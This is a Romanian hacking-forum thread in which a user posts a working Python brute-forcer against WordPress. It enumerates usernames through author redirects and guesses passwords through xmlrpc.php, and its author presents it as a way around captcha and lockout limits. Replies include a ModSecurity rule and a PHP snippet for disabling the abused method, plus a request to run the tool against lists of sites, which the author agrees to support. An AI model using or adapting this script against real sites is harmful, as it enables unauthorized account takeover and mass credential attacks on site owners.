Active Members dancezar Posted October 17, 2014 Active Members Report Share Posted October 17, 2014 (edited) import urllib2import Queueimport threading,sysuseri=[]passwd=[]url=""work=0stiva=Queue.Queue()stiva_us=Queue.Queue()def login(domain,user,passs): xml_post="<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>"+str(user)+"</string></value></param><param><value><string>"+str(passs)+"</string></value></param></params></methodCall>" re=urllib2.Request(domain,xml_post) try: ur=urllib2.urlopen(re) html=ur.read() if "Incorrect username" in html: return 0 elif "isAdmin" in html: return 1 elif "requested method " in html: print "[+] Modulul wp.getUsersBlogs e blocat!" exit() else: print "[!] unknow response" exit() except urllib2.URLError,e: print "[!] Erroare HTTP "+e.code() exit()def enum(j): global work,stiva,url,useri while work==1: try: i=stiva.get(False) try: r=urllib2.Request(url+"?author="+str(i)) u=urllib2.urlopen(r) redirect=u.geturl() if "/author/" in redirect: splited=redirect.split("/author/") us=splited[1].replace("/","") if us not in useri: useri.append(us) print us except urllib2.URLError,e: a=1 if stiva.empty(): return 0 except Queue.Empty: pass else: stiva.task_done()def brute(j): global bad,stiva_us,url,work while work==1: try: creds=stiva_us.get(False) rez=login(url,creds[0],creds[1]) print str(creds[0])+" "+str(creds[1]) if rez==1: print "[+] Got him ^~^ :"+str(creds[0])+" "+str(creds[1]) work=0 except Queue.Empty: pass else: stiva_us.task_done()url=sys.argv[1]passwd=open(sys.argv[3]).read().splitlines()th=[]th_br=[]work=1for i in range(4): t=threading.Thread(target=enum,args=(1,)) th.append(t) t.start()for i in range(12): stiva.put(i)for i in th: i.join()if len(useri)>0: print "[+] Am terminat de enumerat useri:"+str(len(useri)) print "[+] Incep bruteforce"else: print "[-] Nu s-au gasit useri voi incerca cu lista de useri" users=open(sys.argv[2]).read().splitlines() for user in users: useri.append(user) print "[+] Incep bruteforce"print "[+] Testez daca exista xmlrpc.php"r=urllib2.Request(url+"/xmlrpc.php")try: ur=urllib2.urlopen(r)except urllib2.URLError,e: print "[!] "+e.code()+" xmlrpc nu exista!" exit()work=1url+="/xmlrpc.php"for us in useri: for p in passwd: stiva_us.put((us,p))for t in range(int(sys.argv[4])): thr=threading.Thread(target=brute,args=(1,)) th_br.append(thr) thr.start()for t_j in th_br: t_j.join()print "[+] EXIT!"import urllib2 import Queue import threading,sys useri=[] passwd=[] url=" - Pastebin.comAveam nevoie de un bruteforcer pt wordpress care sa treaca de protectii precum capcha sau restrictie prin incercari repetate,mi-am amintit de un articol unde prezenta acest concent si m-am apucat sa fac un bruteforcer in python (nu sunt foarte talentat la python m-am apucat doar de 3 luni).Mai intai v-a incerca sa enumere useri ( aici mai trebuie lucrat nu scoate din titlu ci doar din redirect) , iar apoi v-a face bruteforce.python wp_brute.py site.com userlist.txt passlist.txt NR_THREADSUserlist.txt este necesar atunci cand nu a reusit sa enumere useri.Eu l-am incercat pe 2 site-uri la care am stiut deja parola si pe localhost si a mers. Edited October 18, 2014 by danyweb09 1 Quote Link to comment Share on other sites More sharing options...
gogusan Posted October 18, 2014 Report Share Posted October 18, 2014 SecRule<br /> REQUEST_LINE "POST .*xmlrpc.*"<br /> "pass,initcol:ip=%{REMOTE_ADDR},setvar:ip.maxlimit=+1,deprecatevar:ip.maxlimit=1/600,nolog.....etc.ups Quote Link to comment Share on other sites More sharing options...
Active Members dancezar Posted October 18, 2014 Author Active Members Report Share Posted October 18, 2014 SecRule<br /> REQUEST_LINE "POST .*xmlrpc.*"<br /> "pass,initcol:ip=%{REMOTE_ADDR},setvar:ip.maxlimit=+1,deprecatevar:ip.maxlimit=1/600,nolog.....etc.ups Inteleg ca maxim 600 de requesturi POST pentru xmlrpc , e cam deajuns ca sa faci un bruteforce rapid , singura metoda sigura sa eviti asta e:<?phpadd_filter( 'xmlrpc_methods', 'Remove_Unneeded_XMLRPC' );function Remove_Unneeded_XMLRPC( $methods ) { unset( $methods['wp.getUsersBlogs'] ); return $methods;}?> Quote Link to comment Share on other sites More sharing options...
badboy17 Posted October 18, 2014 Report Share Posted October 18, 2014 Pot in loc de site.com sa adaug o lista de site-uri? Gen site.txt ? Quote Link to comment Share on other sites More sharing options...
Active Members dancezar Posted October 18, 2014 Author Active Members Report Share Posted October 18, 2014 hmmm interesant am sa il fac maine sa mearga si asa...L-a incercat cineva asa cu un single target? Quote Link to comment Share on other sites More sharing options...